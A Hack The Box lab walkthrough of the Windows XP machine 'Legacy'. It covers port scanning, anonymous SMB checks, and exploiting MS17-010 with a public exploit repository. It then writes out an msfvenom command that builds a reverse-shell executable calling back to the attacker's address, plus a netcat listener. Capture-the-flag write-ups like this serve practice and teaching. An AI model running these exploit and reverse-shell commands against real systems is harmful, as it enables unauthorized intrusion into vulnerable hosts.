Legacy

IP

10.10.10.4

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.4 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

135,139,445

let's run a more in-depth scan of these ports

sudo nmap -sCV -p135,139,445 10.10.10.4 -oA nmap_results

results

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-19 07:17 EST
Nmap scan report for 10.10.10.4
Host is up (0.025s latency).

PORT    STATE SERVICE     VERSION
135/tcp open  msrpc       Microsoft Windows RPC
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  ▒           Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2023-12-24T16:15:43+02:00
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4b:1c (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h57m40s, deviation: 1h24m50s, median: 4d23h57m40s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.95 seconds

Looks like we are dealing with a old windows machine Windows XP This should be fun

Lets start with SMB

lets check for anonymous authentication

crackmapexec smb 10.10.10.4 -u anonymous -p ''

After some quick googling, we can see our target is vulnerable to MS08-67 and MS17-010, with this knowledge lets see if we can exploit the target

Lets download the following git repo

https://github.com/worawit/MS17-010.git

to confirm our suspicions we can run the checker.py against the target to see if it is indeed vulnerable

python2 checker.py 10.10.10.4

  • which it is indeed

Now we just need to exploit the target

python2 zzz_exploit.py 10.10.10.4

Now lets create our own reverse shell that will be placed on the target and listen to the incoming call to establish a shell

  1. Lets create a reverse shell script

msfvenom -p windows/shell_reverse_tcp -f exe-service lhost=10.10.14.6 lport=9001 -o shrek123.exe

  1. Now start a nc listener

rlwrap -cAr nc -lvnp 9001

  1. Lets upload and execute the file on the target system

PreviousOptimum HTBNextJerry HTB

Last updated